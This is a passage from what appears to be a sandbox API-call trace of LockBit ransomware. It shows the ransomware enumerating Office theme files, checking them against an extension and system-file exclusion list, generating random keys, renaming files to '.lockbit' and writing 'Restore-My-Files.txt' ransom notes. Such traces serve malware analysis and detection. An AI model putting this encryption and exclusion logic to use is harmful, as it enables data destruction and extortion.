Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.252] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x144c3800, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5ae6080, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x144c3800, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x6818, dwReserved0=0x0, dwReserved1=0x0, cFileName="Flow.eftx", cAlternateFileName="FLOW~1.EFT")) returned 1 [0194.252] lstrcmpiW (lpString1=".", lpString2="Flow.eftx") returned -1 [0194.252] lstrcmpiW (lpString1="..", lpString2="Flow.eftx") returned -1 [0194.252] PathFindExtensionW (pszPath="Flow.eftx") returned=".eftx" [0194.252] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.252] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.252] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.252] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.252] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.252] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.252] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.252] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.252] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.252] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.252] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.252] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.253] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.253] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.253] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Flow.eftx") returned 1 [0194.253] lstrcmpiW (lpString1="ntldr", lpString2="Flow.eftx") returned 1 [0194.253] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Flow.eftx") returned 1 [0194.253] lstrcmpiW (lpString1="bootsect.bak", lpString2="Flow.eftx") returned -1 [0194.253] lstrcmpiW (lpString1="autorun.inf", lpString2="Flow.eftx") returned -1 [0194.253] lstrcmpiW (lpString1="thumbs.db", lpString2="Flow.eftx") returned 1 [0194.253] lstrcmpiW (lpString1="iconcache.db", lpString2="Flow.eftx") returned 1 [0194.253] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.253] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned=".eftx" [0194.253] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.253] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.254] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.254] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.254] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.254] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.254] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.254] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.254] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.254] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.254] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.254] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.254] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.254] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.254] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.254] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx.lockbit") returned 85 [0194.254] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0194.256] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.256] malloc (_Size=0x40068) returned 0x3df0008 [0194.256] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=26648) returned 1 [0194.256] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.257] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.257] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.257] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.257] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.259] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.259] malloc (_Size=0xc0) returned 0x1fa2ed8 [0194.259] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0194.262] free (_Block=0x1fa2ed8) [0194.262] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.262] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.262] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.262] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10b8b100, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b0c1e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x10b8b100, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x4732, dwReserved0=0x0, dwReserved1=0x0, cFileName="Foundry.eftx", cAlternateFileName="FOUNDR~1.EFT")) returned 1 [0194.262] lstrcmpiW (lpString1=".", lpString2="Foundry.eftx") returned -1 [0194.263] lstrcmpiW (lpString1="..", lpString2="Foundry.eftx") returned -1 [0194.263] PathFindExtensionW (pszPath="Foundry.eftx") returned=".eftx" [0194.263] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.263] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.263] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.263] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.263] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.263] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.263] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.263] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.263] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.263] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.263] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.263] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.264] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.264] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.264] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.264] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Foundry.eftx") returned 1 [0194.264] lstrcmpiW (lpString1="ntldr", lpString2="Foundry.eftx") returned 1 [0194.264] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Foundry.eftx") returned 1 [0194.264] lstrcmpiW (lpString1="bootsect.bak", lpString2="Foundry.eftx") returned -1 [0194.264] lstrcmpiW (lpString1="autorun.inf", lpString2="Foundry.eftx") returned -1 [0194.264] lstrcmpiW (lpString1="thumbs.db", lpString2="Foundry.eftx") returned 1 [0194.264] lstrcmpiW (lpString1="iconcache.db", lpString2="Foundry.eftx") returned 1 [0194.264] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.264] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx") returned=".eftx" [0194.264] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.265] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.265] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.265] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.265] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.265] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.265] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.265] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.265] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.265] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.265] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.265] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.265] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.265] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.265] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx.lockbit") returned 88 [0194.265] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0194.267] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.267] malloc (_Size=0x40068) returned 0x1ff1e60 [0194.267] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=18226) returned 1 [0194.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.267] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0194.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0194.268] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.272] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.272] malloc (_Size=0xc6) returned 0x1fa2ed8 [0194.272] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0194.274] free (_Block=0x1fa2ed8) [0194.274] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.274] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.274] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.274] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d84a800, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b0c1e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4d84a800, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x48cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="Grid.eftx", cAlternateFileName="GRID~1.EFT")) returned 1 [0194.274] lstrcmpiW (lpString1=".", lpString2="Grid.eftx") returned -1 [0194.274] lstrcmpiW (lpString1="..", lpString2="Grid.eftx") returned -1 [0194.275] PathFindExtensionW (pszPath="Grid.eftx") returned=".eftx" [0194.275] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.275] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.275] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.275] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.275] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.275] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.275] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.275] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.275] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.275] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.275] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.275] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.275] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.276] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.276] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.276] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Grid.eftx") returned 1 [0194.276] lstrcmpiW (lpString1="ntldr", lpString2="Grid.eftx") returned 1 [0194.276] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Grid.eftx") returned 1 [0194.276] lstrcmpiW (lpString1="bootsect.bak", lpString2="Grid.eftx") returned -1 [0194.276] lstrcmpiW (lpString1="autorun.inf", lpString2="Grid.eftx") returned -1 [0194.276] lstrcmpiW (lpString1="thumbs.db", lpString2="Grid.eftx") returned 1 [0194.276] lstrcmpiW (lpString1="iconcache.db", lpString2="Grid.eftx") returned 1 [0194.276] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.276] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned=".eftx" [0194.277] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.277] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.277] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.277] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.277] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.277] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.277] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.277] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.277] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.277] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.277] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.277] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.277] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") 